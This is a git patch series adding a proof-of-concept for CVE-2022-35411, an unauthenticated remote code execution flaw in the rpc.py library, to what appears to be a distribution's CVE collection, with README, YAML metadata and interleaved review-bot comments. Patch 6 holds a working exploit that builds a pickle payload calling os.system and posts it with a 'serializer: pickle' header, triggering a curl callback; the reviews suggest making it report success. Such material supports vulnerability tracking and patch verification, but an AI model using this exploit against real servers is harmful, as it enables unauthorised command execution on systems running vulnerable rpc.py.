From da838b8ab14f94a87d272bcb74c4b6f62c98a58e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:36:03 +0000 Subject: [PATCH 01/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20python?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/.keep diff --git a/cve/python/.keep b/cve/python/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e38e5e2130402a7dbf335c617d27a8ff946b447c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:37:25 +0000 Subject: [PATCH 02/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/.keep diff --git a/cve/python/2022/.keep b/cve/python/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 0c84289dab108e7368799632cecaac134fc41d19 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:37:36 +0000 Subject: [PATCH 03/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-35411?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/CVE-2022-35411/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/CVE-2022-35411/.keep diff --git a/cve/python/2022/CVE-2022-35411/.keep b/cve/python/2022/CVE-2022-35411/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c7033d86b9f8b3e91c858e7b4f991be521b12be0 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:10 +0000 Subject: [PATCH 04/14] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/python/2022/yaml/.keep 
diff --git a/cve/python/2022/yaml/.keep b/cve/python/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a1763ed3059e76b856497254e7912322689e1252 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:22 +0000 Subject: [PATCH 05/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/.keep diff --git a/cve/python/2022/.keep b/cve/python/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 203a681d25f902eb4c4cb46cbe172e15bd9dc731 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:38:58 +0000 Subject: [PATCH 06/14] poc Signed-off-by: fanyunpeng --- .../2022/CVE-2022-35411/CVE-2022-35411.py | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 cve/python/2022/CVE-2022-35411/CVE-2022-35411.py diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py new file mode 100644 index 00000000..467cc175 --- /dev/null +++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py 
@@ -0,0 +1,52 @@ +# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2022-07-12 +# Exploit Author: Elias Hohl +# Vendor Homepage: https://github.com/abersheeran +# Software Link: https://github.com/abersheeran/rpc.py +# Version: v0.4.2 - v0.6.0 +# Tested on: Debian 11, Ubuntu 20.04 +# CVE : CVE-2022-35411 + +import requests +import pickle + +# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py + +HOST =3D "127.0.0.1:65432" + +URL =3D f"http://{HOST}/sayhi" + +HEADERS =3D { + "serializer": "pickle" +} + + +def generate_payload(cmd): + + class PickleRce(object): + def __reduce__(self): + import os + return os.system, (cmd,) + + payload =3D pickle.dumps(PickleRce()) + + print(payload) + + return payload + + +def exec_command(cmd): + + payload =3D generate_payload(cmd) + + requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) + + +def main(): + exec_command('curl http://127.0.0.1:4321') + # exec_command('uname -a') + + +if __name__ =3D=3D "__main__": + main() \ No newline at end of file -- Gitee From 69eda5626a071e9c7a9faa3d6a4a791e760a4d3b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:39:07 +0000 Subject: [PATCH 07/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/CVE-2022-35411/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/CVE-2022-35411/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/CVE-2022-35411/.keep diff --git a/cve/python/2022/CVE-2022-35411/.keep b/cve/python/2022/CVE-2022-35411/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a0f101be0907720a642b1c43a820ef57bb31a9a3 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:41:27 +0000 Subject: [PATCH 08/14] add cve/python/2022/CVE-2022-35411/README.md. 
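Review bot: Every `=` in the new file is shown as `=3D` (`HOST =3D`, `url=3DURL`, `__name__ =3D=3D`), which is quoted-printable transport encoding; if that survived into the committed `CVE-2022-35411.py` the module does not parse, so the applied file should be checked for a literal `=3D` before the README's `python CVE-2022-35411.py` is trusted. `exec_command` discards the `requests.post` result and sets no timeout, so the script neither reports whether the server accepted the pickle serializer nor terminates if the target never answers; `resp = requests.post(url=URL, data=payload, headers=HEADERS, timeout=10)` followed by `print(resp.status_code)` gives a verifier a usable signal. The only other observable is the `curl http://127.0.0.1:4321` callback in `main()`, which needs a listener on that port that nothing in the file or README mentions; a module docstring stating that the request exercises the `serializer: pickle` header path and that a loopback listener on 4321 is the expected indicator of success would make the PoC usable for patch verification.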
Signed-off-by: fanyunpeng --- cve/python/2022/CVE-2022-35411/README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/python/2022/CVE-2022-35411/README.md diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md new file mode 100644 index 00000000..607a59d0 --- /dev/null +++ b/cve/python/2022/CVE-2022-35411/README.md @@ -0,0 +1,18 @@ +# rpc.py 0.6.0 - Remote Code Execution (RCE) +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 +# Usage +``` +python CVE-2022-35411.py +``` +# reference +http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html +https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory +https://github.com/ehtec/rpcpy-exploit Third Party Advisory +https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30 \ No newline at end of file -- Gitee From 2be571863703e0a8571e6ff4d022b28f3dbe6243 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:41:48 +0000 Subject: [PATCH 09/14] update cve/python/2022/CVE-2022-35411/README.md. Signed-off-by: fanyunpeng --- cve/python/2022/CVE-2022-35411/README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md index 607a59d0..fbc23347 100644 --- a/cve/python/2022/CVE-2022-35411/README.md +++ b/cve/python/2022/CVE-2022-35411/README.md 
@@ -1,12 +1,12 @@ # rpc.py 0.6.0 - Remote Code Execution (RCE) -Google Dork: N/A -Date: 2022-07-12 -Exploit Author: Elias Hohl -Vendor Homepage: https://github.com/abersheeran -Software Link: https://github.com/abersheeran/rpc.py -Version: v0.4.2 - v0.6.0 -Tested on: Debian 11, Ubuntu 20.04 -CVE : CVE-2022-35411 +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 # Usage ``` python CVE-2022-35411.py -- Gitee From 7367f27c085ee0b7c3007e2675ebe866928c436e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:49:22 +0000 Subject: [PATCH 10/14] add cve/python/2022/yaml/CVE-2022-35411.yaml. Signed-off-by: fanyunpeng --- cve/python/2022/yaml/CVE-2022-35411.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/python/2022/yaml/CVE-2022-35411.yaml diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml new file mode 100644 index 00000000..d1b35d84 --- /dev/null +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml 
@@ -0,0 +1,22 @@ +id: CVE-2022-35411 +source: https://www.exploit-db.com/exploits/50983 +info: + name: python中的rpc库。 + severity: critical + description: + rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. + scope-of-influence: + rpc.py v0.4.2 - v0.6.0 + reference: + - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html + - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd + - https://github.com/ehtec/rpcpy-exploit + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-35411 + cwe-id: None + cnvd-id: None + kve-id: None + tags: + - 远程代码执行 -- Gitee From dddc281a43a1642c8f673ef40f51ca0c8ae2caa7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:50:06 +0000 Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/2022/yaml/.keep diff --git a/cve/python/2022/yaml/.keep b/cve/python/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From dd09aeb67e5e58e30a2ac1bd50e5c293a993644b Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:50:27 +0000 Subject: [PATCH 12/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/python/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/python/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/python/.keep 
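Review bot: `cwe-id: None` is wrong for the weakness the `description` itself states (unpickling attacker-supplied data); the matching class is `cwe-id: CWE-502` (Deserialization of Untrusted Data), to be confirmed against the NVD record. The description's `"serializer-pickle" HTTP header` does not match the request the bundled PoC sends, which is a header named `serializer` with the value `pickle`; if the text is quoted from the upstream advisory it should be marked as such, otherwise `the "serializer: pickle" HTTP header` is the accurate wording. `scope-of-influence` gives `v0.4.2 - v0.6.0` while the description says `through 0.6.0`; the two ranges should agree on whether versions before 0.4.2 are considered affected.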
diff --git a/cve/python/.keep b/cve/python/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6db8bffe310000f8e0ee693b41502a799f6e7e4f Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:51:30 +0000 Subject: [PATCH 13/14] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index caeacc6e..6f53e1c5 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -74,6 +74,8 @@ cve: polkit: - CVE-2021-4034 - CVE-2021-4115 + python: + - CVE-2022-35411 vim: - CVE-2021-3778 - CVE-2022-0351 -- Gitee From bb583ddf24b9c9f83e759b787ad559fefdf2de17 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Fri, 17 Mar 2023 05:30:27 +0000 Subject: [PATCH 14/14] update cve/python/2022/yaml/CVE-2022-35411.yaml. Signed-off-by: fanyunpeng --- cve/python/2022/yaml/CVE-2022-35411.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index d1b35d84..3e14c184 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -1,7 +1,7 @@ id: CVE-2022-35411 source: https://www.exploit-db.com/exploits/50983 info: - name: python中的rpc库。 + name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 severity: critical description: rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. -- Gitee
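Review bot: The new `python:` key files CVE-2022-35411 under the interpreter, but the affected component per the sibling YAML is the third-party `rpc.py` library, not CPython; the neighbouring keys (`polkit`, `vim`) name the actual package, so a triager grepping this list for the `python` package would get a false hit. If the list is keyed by distribution package, `rpc.py:` (or whatever the package is named in the target distribution) is the consistent choice; if `python` is meant as an ecosystem umbrella, that convention is not visible here and deserves a comment at the key. This applies to the hunk in patch 13/14 only; the patch 14 hunk on the same line is a wording change.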